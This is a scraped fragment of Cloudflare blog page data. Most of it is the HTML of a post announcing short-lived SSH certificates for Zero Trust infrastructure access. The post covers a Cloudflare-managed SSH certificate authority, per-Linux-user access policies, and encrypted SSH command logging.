to use our predictive AI models to scan existing inbox messages. Retro Scan will detect and highlight any threats found, enabling organizations to remediate them directly in their email accounts. With these insights, organizations can implement further controls, either using Cloudflare Email Security or their preferred solution, to prevent similar threats from reaching their inboxes in the future.</p>"],"published_at":[0,"2024-12-19T14:00+00:00"],"updated_at":[0,"2025-01-07T00:04:42.739Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5ihRcYoYTlJ1bQX7kvDFtJ/2a18435e8bc2bab65507926f2e0b0d54/Screenshot_2024-12-18_at_12.34.35_PM.png"],"tags":[1,[[0,{"id":[0,"73lXar1fZP6qrIIcgBA5Te"],"name":[0,"Cloud Email Security"],"slug":[0,"cloud-email-security"]}],[0,{"id":[0,"2UI24t7uddD0CIIUJCu1f4"],"name":[0,"SASE"],"slug":[0,"sase"]}],[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}],[0,{"id":[0,"2Kxh34kIQRA3gyymmhJpsR"],"name":[0,"Email Security"],"slug":[0,"email-security"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"Ayush Kumar"],"slug":[0,"ayush"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/16XufphFwxLrjgrc4HQd5K/31b6f03b182f3fd13f09ad34ad9de18c/ayush.png"],"location":[0,null],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}],[0,{"name":[0,"Justin Knapp"],"slug":[0,"justin-knapp"],"bio":[0],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/56CTtNKqADkFwlTD4KVmKe/f99b412bb32aeb9efa83494b30efd951/1598985847927.jpg"],"location":[0],"website":[0],"twitter":[0],"facebook":[0]}]]],"meta_description":[0,"As threats evolve, SOC teams must adapt their operations. With Cloudflare’s holistic approach to managing user-based risk, SOC teams can operate more efficiently and reduce the likelihood of a breach."],"primary_author":[0,{}],"localeList":[0,{"name":[0,"blog-english-only"],"enUS":[0,"English for Locale"],"zhCN":[0,"No Page for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"No Page for Locale"],"frFR":[0,"No Page for Locale"],"deDE":[0,"No Page for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"No Page for Locale"],"koKR":[0,"No Page for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"No Page for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/the-role-of-email-security-in-reducing-user-risk-amid-rising-threats"],"metadata":[0,{"title":[0,"The role of email security in reducing user risk amid rising threats"],"description":[0,"As threats evolve, SOC teams must adapt their operations. With Cloudflare’s holistic approach to managing user-based risk, SOC teams can operate more efficiently and reduce the likelihood of a breach."],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/74pgqaKfcXIFEGPLtzSLkf/c3d5704dae4e5a3a9a8a4dcd68e7aa76/BLOG-2645_OG.png"]}]}],"translations":[0,{"posts.by":[0,"By"],"footer.gdpr":[0,"GDPR"],"lang_blurb1":[0,"This post is also available in {lang1}."],"lang_blurb2":[0,"This post is also available in {lang1} and {lang2}."],"lang_blurb3":[0,"This post is also available in {lang1}, {lang2} and {lang3}."],"footer.press":[0,"Press"],"header.title":[0,"The Cloudflare Blog"],"search.clear":[0,"Clear"],"search.filter":[0,"Filter"],"search.source":[0,"Source"],"footer.careers":[0,"Careers"],"footer.company":[0,"Company"],"footer.support":[0,"Support"],"footer.the_net":[0,"theNet"],"search.filters":[0,"Filters"],"footer.our_team":[0,"Our team"],"footer.webinars":[0,"Webinars"],"page.more_posts":[0,"More posts"],"posts.time_read":[0,"{time} min read"],"search.language":[0,"Language"],"footer.community":[0,"Community"],"footer.resources":[0,"Resources"],"footer.solutions":[0,"Solutions"],"footer.trademark":[0,"Trademark"],"header.subscribe":[0,"Subscribe"],"footer.compliance":[0,"Compliance"],"footer.free_plans":[0,"Free plans"],"footer.impact_ESG":[0,"Impact/ESG"],"posts.follow_on_X":[0,"Follow on X"],"footer.help_center":[0,"Help center"],"footer.network_map":[0,"Network Map"],"header.please_wait":[0,"Please Wait"],"page.related_posts":[0,"Related posts"],"search.result_stat":[0,"Results <strong>{search_range}</strong> of <strong>{search_total}</strong> for <strong>{search_keyword}</strong>"],"footer.case_studies":[0,"Case Studies"],"footer.connect_2024":[0,"Connect 2024"],"footer.terms_of_use":[0,"Terms of Use"],"footer.white_papers":[0,"White Papers"],"footer.cloudflare_tv":[0,"Cloudflare TV"],"footer.community_hub":[0,"Community Hub"],"footer.compare_plans":[0,"Compare plans"],"footer.contact_sales":[0,"Contact Sales"],"header.contact_sales":[0,"Contact Sales"],"header.email_address":[0,"Email Address"],"page.error.not_found":[0,"Page not found"],"footer.developer_docs":[0,"Developer docs"],"footer.privacy_policy":[0,"Privacy Policy"],"footer.request_a_demo":[0,"Request a demo"],"page.continue_reading":[0,"Continue reading"],"footer.analysts_report":[0,"Analyst reports"],"footer.for_enterprises":[0,"For enterprises"],"footer.getting_started":[0,"Getting Started"],"footer.learning_center":[0,"Learning Center"],"footer.project_galileo":[0,"Project Galileo"],"pagination.newer_posts":[0,"Newer Posts"],"pagination.older_posts":[0,"Older Posts"],"posts.social_buttons.x":[0,"Discuss on X"],"search.icon_aria_label":[0,"Search"],"search.source_location":[0,"Source/Location"],"footer.about_cloudflare":[0,"About Cloudflare"],"footer.athenian_project":[0,"Athenian Project"],"footer.become_a_partner":[0,"Become a partner"],"footer.cloudflare_radar":[0,"Cloudflare Radar"],"footer.network_services":[0,"Network services"],"footer.trust_and_safety":[0,"Trust & Safety"],"header.get_started_free":[0,"Get Started Free"],"page.search.placeholder":[0,"Search Cloudflare"],"footer.cloudflare_status":[0,"Cloudflare Status"],"footer.cookie_preference":[0,"Cookie Preferences"],"header.valid_email_error":[0,"Must be valid email."],"search.result_stat_empty":[0,"Results <strong>{search_range}</strong> of <strong>{search_total}</strong>"],"footer.connectivity_cloud":[0,"Connectivity cloud"],"footer.developer_services":[0,"Developer services"],"footer.investor_relations":[0,"Investor relations"],"page.not_found.error_code":[0,"Error Code: 404"],"search.autocomplete_title":[0,"Insert a query. Press enter to send"],"footer.logos_and_press_kit":[0,"Logos & press kit"],"footer.application_services":[0,"Application services"],"footer.get_a_recommendation":[0,"Get a recommendation"],"posts.social_buttons.reddit":[0,"Discuss on Reddit"],"footer.sse_and_sase_services":[0,"SSE and SASE services"],"page.not_found.outdated_link":[0,"You may have used an outdated link, or you may have typed the address incorrectly."],"footer.report_security_issues":[0,"Report Security Issues"],"page.error.error_message_page":[0,"Sorry, we can't find the page you are looking for."],"header.subscribe_notifications":[0,"Subscribe to receive notifications of new posts:"],"footer.cloudflare_for_campaigns":[0,"Cloudflare for Campaigns"],"header.subscription_confimation":[0,"Subscription confirmed. Thank you for subscribing!"],"posts.social_buttons.hackernews":[0,"Discuss on Hacker News"],"footer.diversity_equity_inclusion":[0,"Diversity, equity & inclusion"],"footer.critical_infrastructure_defense_project":[0,"Critical Infrastructure Defense Project"]}]}" ssr client="load" opts="{"name":"PostCard","value":true}" await-children> <article class="w-50-l mt4 mt2-l mb4 ph3 bb b--gray8 bn-l"> <div class="w-100"> <a href="https://blog-cloudflare-com.translate.goog/the-role-of-email-security-in-reducing-user-risk-amid-rising-threats/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 no-underline gray1" data-testid="post-title"><h2 class="fw5 mt2">The role of email security in reducing user risk amid rising threats</h2></a> <p class="f3 fw5 gray5 my" data-testid="post-date">2024-12-19</p> <div class=""> <a href="https://blog-cloudflare-com.translate.goog/tag/cloud-email-security/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Cloud Email Security</a><a href="https://blog-cloudflare-com.translate.goog/tag/sase/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">SASE</a><a href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Zero Trust</a><a href="https://blog-cloudflare-com.translate.goog/tag/email-security/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Email Security</a> </div> <p class="f3 fw4 gray1 lh-copy " data-testid="post-content">As threats evolve, SOC teams must adapt their operations. With Cloudflare’s holistic approach to managing user-based risk, SOC teams can operate more efficiently and reduce the likelihood of a breach.<!-- -->...</p> <ul class="author-lists flex pl0"> <li class="list flex items-center pr2 mb3"><a href="https://blog-cloudflare-com.translate.goog/author/ayush/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="static-avatar pr1"><img class="author-profile-image br-100 mr2" src="https://blog.cloudflare.com/cdn-cgi/image/format=auto,dpr=3,width=64,height=64,gravity=face,fit=crop,zoom=0.5/https://cf-assets.www.cloudflare.com/zkvhlag99gkb/16XufphFwxLrjgrc4HQd5K/31b6f03b182f3fd13f09ad34ad9de18c/ayush.png" alt="Ayush Kumar" width="62" height="62"></a> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/ayush/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw4 f3 no-underline black">Ayush Kumar</a> </div></li> <li class="list flex items-center pr2 mb3"><a href="https://blog-cloudflare-com.translate.goog/author/justin-knapp/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="static-avatar pr1"><img class="author-profile-image br-100 mr2" src="https://blog.cloudflare.com/cdn-cgi/image/format=auto,dpr=3,width=64,height=64,gravity=face,fit=crop,zoom=0.5/https://cf-assets.www.cloudflare.com/zkvhlag99gkb/56CTtNKqADkFwlTD4KVmKe/f99b412bb32aeb9efa83494b30efd951/1598985847927.jpg" alt="Justin Knapp" width="62" height="62"></a> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/justin-knapp/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw4 f3 no-underline black">Justin Knapp</a> </div></li> </ul> </div> </article><!--astro:end--> </astro-island><astro-island uid="25Hqsc" prefix="r2" component-url="/_astro/PostCard.CG32ktie.js" component-export="PostCard" renderer-url="/_astro/client.DLO1yDVm.js" props="{"currentPage":[0,1],"isFeaturedImageFirstPost":[0,false],"post":[0,{"id":[0,"KUIHP5Rgyl2H3pGVE6m99"],"title":[0,"Fearless SSH: short-lived certificates bring Zero Trust to infrastructure"],"slug":[0,"intro-access-for-infrastructure-ssh"],"excerpt":[0,"Access for Infrastructure, BastionZero’s integration into Cloudflare One, will enable organizations to apply Zero Trust controls to their servers, databases, Kubernetes clusters, and more. Today we’re announcing short-lived SSH access as the first available feature of this integration.\n"],"featured":[0,false],"html":[0,"<p><a href=\"https://blog.cloudflare.com/cloudflare-acquires-bastionzero\"><u>BastionZero joined Cloudflare</u></a> in May 2024. We are thrilled to announce Access for Infrastructure as BastionZero’s native integration into our <a href=\"https://www.cloudflare.com/learning/access-management/what-is-sase/\"><u>SASE</u></a> platform, Cloudflare One. Access for Infrastructure will enable organizations to apply Zero Trust controls in front of their servers, databases, network devices, Kubernetes clusters, and more. Today, we’re announcing <a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/use-cases/ssh/ssh-infrastructure-access/#_top\"><u>short-lived SSH access</u></a> as the first available feature. Over the coming months we will announce support for other popular infrastructure access target types like <a href=\"https://www.cloudflare.com/learning/access-management/what-is-the-remote-desktop-protocol/\"><u>Remote Desktop Protocol (RDP)</u></a>, Kubernetes, and databases.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"applying-zero-trust-principles-to-infrastructure\">Applying Zero Trust principles to infrastructure</h2>\n <a href=\"#applying-zero-trust-principles-to-infrastructure\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Organizations have embraced <a href=\"https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/\"><u>Zero Trust</u></a> initiatives that modernize secure access to web applications and networks, but often the strategies they use to manage privileged access to their infrastructure can be siloed, overcomplicated, or ineffective. When we speak to customers about their infrastructure access solution, we see common themes and pain points:</p><ul><li><p><b>Too risky:</b> Long-lived credentials and shared keys get passed around and inflate the risk of compromise, excessive permissions, and lateral movement</p></li><li><p><b>Too clunky</b>: Manual credential rotations and poor visibility into infrastructure access slow down incident response and compliance efforts</p></li></ul><p>Some organizations have dealt with the problem of privileged access to their infrastructure by purchasing a <a href=\"https://en.wikipedia.org/wiki/Privileged_access_management\"><u>Privileged Access Management (PAM)</u></a> solution or by building a homegrown key management tool. Traditional PAM solutions introduce audit logging and session recording features that capture user interactions with their servers and other infrastructure and/or centralized vaults that rotate keys and passwords for infrastructure every time a key is used. But this centralization can introduce performance bottlenecks, harm usability, and come with a significant price tag. Meanwhile, homegrown solutions are built from primitives provided by cloud providers or custom infrastructure-as-code solutions, and can be costly and tiresome to build out and maintain. </p><p>We believe that organizations should apply Zero Trust principles to their most sensitive corporate resources, which naturally includes their infrastructure. That’s why we’re augmenting Cloudflare’s <a href=\"https://www.cloudflare.com/learning/access-management/what-is-ztna/\"><u>Zero Trust Network Access (ZTNA)</u></a> service with <a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/use-cases/ssh/ssh-infrastructure-access/#_top\"><u>Access to Infrastructure</u></a> to support privileged access to sensitive infrastructure, and offering features that will look somewhat similar to those found in a PAM solution:</p><ul><li><p><b>Access</b>: Connect remote users to infrastructure targets via Cloudflare’s global network.</p></li><li><p><b>Authentication</b>: Eliminate the management of credentials for servers, containers, clusters, and databases and replace them with <a href=\"https://www.cloudflare.com/learning/access-management/what-is-sso/\"><u>SSO</u></a>, <a href=\"https://www.cloudflare.com/learning/access-management/what-is-multi-factor-authentication/\"><u>MFA</u></a>, and <a href=\"https://blog.cloudflare.com/6-new-ways-to-validate-device-posture/\"><u>device posture</u></a>. </p></li><li><p><b>Authorization</b>: Use policy-based access control to determine who can access what target, when, and under what role. </p></li><li><p><b>Auditing</b>: Provide command logs and session recordings to allow administrators to audit and replay their developers’ interactions with the organization’s infrastructure.</p></li></ul><p>At Cloudflare, we are big believers that unified experiences produce the best security outcomes, and because of that, we are natively rebuilding each BastionZero feature into Cloudflare’s ZTNA service. Today, we will cover the recently-released feature for short-lived SSH access.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"secure-shell-ssh-and-its-security-risks\">Secure Shell (SSH) and its security risks</h2>\n <a href=\"#secure-shell-ssh-and-its-security-risks\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p><a href=\"https://www.cloudflare.com/learning/access-management/what-is-ssh/\"><u>SSH</u></a> (Secure Shell) is a protocol that is commonly used by developers or system administrators to secure the connections used to remotely administer and manage (usually Linux/Unix) servers. SSH access to a server often comes with elevated privileges, including the ability to delete or <a href=\"https://www.cloudflare.com/learning/security/what-is-data-exfiltration/\">exfiltrate</a> data or to install or remove applications on the server. </p><p>Modern enterprises can have tens, hundreds, or even thousands of SSH targets. Servers accessible via SSH can be targeted in <a href=\"https://thehackernews.com/2023/12/warning-poorly-secured-linux-ssh.html\"><u>cryptojacking</u></a> or <a href=\"https://thehackernews.com/2023/06/cybercriminals-hijacking-vulnerable-ssh.html\"><u>proxyjacking</u></a> attacks. Manually tracking, rotating, and validating SSH credentials that grant access is a chore that is often left undone, which creates risks that these long-lived credentials could be compromised. There’s nothing stopping users from copying SSH credentials and sharing them with other users or transferring them to unauthorized devices.</p><p>Although many organizations will gate access to their servers to users that are inside their corporate network, this is no longer enough to protect against modern attackers. Today, the principles of Zero Trust demand that an organization also tracks who exactly is accessing their servers with SSH, and what commands they are running on those servers once they have access. In fact, the elevated privileges that come along with SSH access mean that compliance frameworks like <a href=\"https://www.cloudflare.com/en-gb/trust-hub/compliance-resources/soc-2/\"><u>SOC2</u></a>, <a href=\"https://www.cloudflare.com/en-gb/trust-hub/compliance-resources/iso-certifications/\"><u>ISO27001</u></a>, <a href=\"https://www.cloudflare.com/en-gb/trust-hub/compliance-resources/fedramp/\"><u>FedRAMP</u></a> and others have criteria that require monitoring who has access with SSH and what exactly they are doing with that access. </p>\n <div class=\"flex anchor relative\">\n <h2 id=\"introducing-ssh-with-access-for-infrastructure\">Introducing SSH with Access for Infrastructure</h2>\n <a href=\"#introducing-ssh-with-access-for-infrastructure\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>We’ve introduced<a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/use-cases/ssh/ssh-infrastructure-access/#_top\"><u> SSH with Access for Infrastructure</u></a> to provide customers with granular control over privileged access to servers via SSH. The feature provides improved visibility into who accessed what service and what they did during their SSH session, while also eliminating the risk and overhead associated with managing SSH credentials. Specifically, this feature enables organizations to:</p><ul><li><p>Eliminate security risk and overhead of managing SSH keys and instead use short-lived SSH certificates issued by a Cloudflare-managed certificate authority (CA).</p></li><li><p>Author fine-grained policy to govern who can SSH to your servers and through which SSH user(s) they can log in as.</p></li><li><p>Monitor infrastructure access with Access and SSH command logs, supporting regulatory compliance and providing visibility in case of security breach.</p></li><li><p>Avoid changing end-user workflows. SSH with Access for Infrastructure supports whatever native SSH clients end users happen to be using. </p></li></ul><p>SSH with Access for Infrastructure is supported through one of the most common deployment models of Cloudflare One customers. Users can connect using our device client (WARP), and targets are made accessible using Cloudflare Tunnel (cloudflared or the WARP connector). This architecture allows customers with existing Cloudflare One deployments to enable this feature with little to no effort. The only additional setup will be configuring your target server to accept a Cloudflare SSH certificate.</p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4msjrxXyhuuh7rUmB0zn8c/3e24a431820aee57651bad1d57e57ec5/BLOG-2604_2.png\" alt=\"BLOG-2604 2\" class=\"kg-image\" width=\"1999\" height=\"823\" loading=\"lazy\"/>\n </figure><p>Cloudflare One already offers multiple ways to secure organizations&#39; SSH traffic through network controls. This new SSH with Access for Infrastructure aims to incorporate the strengths of those existing solutions together with additional controls to authorize ports, protocols, and specific users as well as a much improved deployment workflow and audit logging capabilities.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"eliminating-ssh-credentials-using-an-ssh-ca\">Eliminating SSH credentials using an SSH CA</h2>\n <a href=\"#eliminating-ssh-credentials-using-an-ssh-ca\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>How does Access for Infrastructure eliminate your SSH credentials? This is done by replacing SSH password and SSH keys with an SSH Certificate Authority (CA) that is managed by Cloudflare. Generally speaking, a CA’s job is to issue certificates that bind an entity to an entity’s public key. Cloudflare’s SSH CA has a secret key that is used to sign certificates that authorize access to a target (server) via SSH, and a public key that is used by the target (server) to cryptographically validate these certificates. The public key for the SSH CA can be obtained by <a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/use-cases/ssh/ssh-infrastructure-access/#generate-a-cloudflare-ssh-ca\"><u>querying the Cloudflare API</u></a>. And the secret key for the SSH CA is kept secure by Cloudflare and never exposed to anyone. </p><p>To use SSH with Access for Infrastructure to grant access via SSH to a set of targets (i.e. servers), you need to <a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/use-cases/ssh/ssh-infrastructure-access/#modify-your-sshd-config\"><u>instruct those servers to trust the Cloudflare SSH CA</u></a>. Those servers will then grant access via SSH whenever they are presented with an SSH certificate that is validly signed by the Cloudflare SSH CA.</p><p>The same Cloudflare SSH CA is used to support SSH access for all of your developers and engineers to all your target servers. This greatly simplifies key management. You no longer need to manage long-lived SSH keys and passwords for individual end users, because access to targets with SSH is granted via certificates that are dynamically issued by the Cloudflare SSH CA. And, because the Cloudflare SSH CA issued short-lived SSH certificates that expire after 3 minutes, you also don’t have to worry about creating or managing long-lived SSH credentials that could be stolen by attackers. </p><p>The 3-minute time window on the SSH certificate only applies to the time window during which the user has to authenticate to the target server; it does not apply to the length of the SSH session, which can be arbitrarily longer than 3 minutes. This 3-minute window was chosen because it was short enough to reduce the risk of security compromise and long enough to ensure that we don’t miss the time window of the user’s authentication to the server, especially if the user is on a slow connection.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"centrally-managing-policies-down-to-the-specific-linux-user\">Centrally managing policies down to the specific Linux user</h2>\n <a href=\"#centrally-managing-policies-down-to-the-specific-linux-user\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>One of the problems with traditional SSH is that once a user has an SSH key or password installed on a server, they will have access to that server forever — unless an administrator somehow remembers to remove their SSH key or password from the server in question. This leads to <i>privilege creep,</i> where too many people have standing access to too many servers, creating a security risk if an SSH key or password is ever stolen or leaked.</p><p>Instead, SSH with Access for Infrastructure allows you to centrally write policies in the Cloudflare dashboard specifying exactly what (set of) users has access to what (set of) servers. Users may be authenticated by SSO, MFA, device posture, location, and more, which provides better security than just authenticating them via long-lived SSH keys or passwords that could be stolen by attackers.</p><p>Moreover, the SSH certificates issued by the Cloudflare CA include a field called <i>valid_principals</i> which indicates the specific Linux user (e.g. <i>root</i>, <i>read-only</i>, <i>ubuntu</i>, <i>ec2-user</i>) that can be assumed by the SSH connection. As such, you can write policies that specify the (set of) Linux users that a given (set of) end users may access on a given (set of) servers, as shown in the figure below. This allows you to centrally control the privileges that a given end user has when accessing a given target server. (The one caveat here is that the server must also be pre-configured to already know about the specific Linux user (e.g. <i>root) </i>that is specified in the policies and presented in the SSH certificate. Cloudflare is NOT managing the Linux users on your Linux servers.)</p><p>As shown below, you could write a policy that says users in Canada, the UK, and Australia that are authenticated with MFA and face recognition can access the <i>root </i>and <i>ec2-user </i>Linux users on a given set of servers in AWS.</p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4D580wfY5DxQ9iSNhflztJ/a97eea9e68b0a44ea2b9c544d1cf3bda/BLOG-2604_3.png\" alt=\"BLOG-2604 3\" class=\"kg-image\" width=\"1336\" height=\"1172\" loading=\"lazy\"/>\n </figure>\n <div class=\"flex anchor relative\">\n <h2 id=\"how-does-cloudflare-capture-ssh-command-logs\">How does Cloudflare capture SSH command logs?</h2>\n <a href=\"#how-does-cloudflare-capture-ssh-command-logs\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Cloudflare captures SSH command logs because we built an SSH proxy that intercepts the SSH connections. The SSH proxy establishes one SSH connection between itself and the end user’s SSH client, and another SSH connection between itself and the target (server). The SSH proxy can therefore inspect the SSH commands and log them. </p><p>SSH commands are encrypted at rest using a public key that the customer uploads via the Cloudflare API. Cloudflare cannot read SSH command logs at rest, but they can be extracted (in encrypted form) from the Cloudflare API and decrypted by the customer (who holds the corresponding private key). Instructions for uploading the <a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/use-cases/ssh/ssh-infrastructure-access/#enable-ssh-command-logging\"><u>encryption public key are available in our developer documentation</u></a>.</p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1KvuPqP9XfUn5M6sE5Qvw4/c8eb24587b4301d4ca9bfad0b2037ee1/Log_for_digital-ocean.png\" 